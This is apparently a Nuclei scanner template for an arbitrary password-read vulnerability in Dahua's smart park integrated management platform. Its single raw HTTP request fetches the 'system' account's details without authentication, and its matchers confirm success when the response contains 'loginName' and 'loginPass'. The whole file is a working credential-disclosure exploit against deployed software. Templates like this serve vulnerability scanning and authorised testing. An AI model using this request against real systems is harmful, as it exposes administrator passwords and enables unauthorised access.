id: dahua-user-getuserinfobyusername-getpassword

info:
  name: 大华智慧园区综合管理平台 user_getUserInfoByUserName.action 任意密码读取漏洞
  author: H0nayuzu
  severity: high
  description: |
    大华智慧园区综合管理平台是大华技术提供的一种智能化解决方案，旨在提供全面的园区管理和安全监控功能。大华智慧园区综合管理平台 user_getUserInfoByUserName.action 存在任意密码读取漏洞
  metadata:
  tags: dahua

http:
  - raw:
      - |
        GET /admin/user_getUserInfoByUserName.action?userName=system HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "\"loginName\":\"system\",\"loginPass\""

      - type: status
        status:
          - 200